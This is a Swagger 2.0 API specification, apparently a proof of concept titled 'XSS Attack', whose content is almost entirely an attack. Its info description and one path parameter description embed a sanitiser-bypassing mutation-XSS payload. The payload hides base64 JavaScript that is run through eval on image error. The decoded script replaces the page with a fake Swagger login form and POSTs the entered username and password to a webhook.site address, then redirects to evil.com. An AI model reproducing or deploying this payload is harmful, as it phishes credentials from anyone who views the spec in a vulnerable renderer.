swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
    <img src=x id='YWxlcnQoJ1BsZWFzZSBsb2dpbiB0byBjb250aW51ZScpO2RvY3VtZW50LmJvZHkuaW5uZXJIVE1MPVwiXCI7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EuaW5uZXJIVE1MPVwnPGNlbnRlcj48Yj5GQUtFIHN3YWdnZXIgTG9naW48L2I+PGJyPlVzZXJuYW1lOiA8aW5wdXQgbmFtZT1cInVzZXJOYW1lXCI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT1cInBhc3N3b3JkXCIgbmFtZT1cInB3ZFwiPjxicj48aW5wdXQgdHlwZT1cInN1Ym1pdFwiIHZhbHVlPVwiTG9naW5cIj48L2NlbnRlcj5cJzthLm9uc3VibWl0PWZ1bmN0aW9uKGUpe2UucHJldmVudERlZmF1bHQoKTt2YXIgZj1uZXcgRm9ybURhdGEoYSk7dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCJQT1NUIiwiaHR0cHM6Ly93ZWJob29rLnNpdGUvN2Y4MTAzMjUtZDRkYi00OGViLThiMjctNzQzMjViNDQ2ZTliIik7eC5zZW5kKGYpO3dpbmRvdy5sb2NhdGlvbi5ocmVmPVwiaHR0cHM6Ly9ldmlsLmNvbVwiO307ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=' onerror='eval(atob(this.id))'>
    ">
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
            <img src=x id='YWxlcnQoJ1BsZWFzZSBsb2dpbiB0byBjb250aW51ZScpO2RvY3VtZW50LmJvZHkuaW5uZXJIVE1MPVwiXCI7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EuaW5uZXJIVE1MPVwnPGNlbnRlcj48Yj5GQUtFIHN3YWdnZXIgTG9naW48L2I+PGJyPlVzZXJuYW1lOiA8aW5wdXQgbmFtZT1cInVzZXJOYW1lXCI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT1cInBhc3N3b3JkXCIgbmFtZT1cInB3ZFwiPjxicj48aW5wdXQgdHlwZT1cInN1Ym1pdFwiIHZhbHVlPVwiTG9naW5cIj48L2NlbnRlcj5cJzthLm9uc3VibWl0PWZ1bmN0aW9uKGUpe2UucHJldmVudERlZmF1bHQoKTt2YXIgZj1uZXcgRm9ybURhdGEoYSk7dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCJQT1NUIiwiaHR0cHM6Ly93ZWJob29rLnNpdGUvN2Y4MTAzMjUtZDRkYi00OGViLThiMjctNzQzMjViNDQ2ZTliIik7eC5zZW5kKGYpO3dpbmRvdy5sb2NhdGlvbi5ocmVmPVwiaHR0cHM6Ly9ldmlsLmNvbVwiO307ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=' onerror='eval(atob(this.id))'>
            ">
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
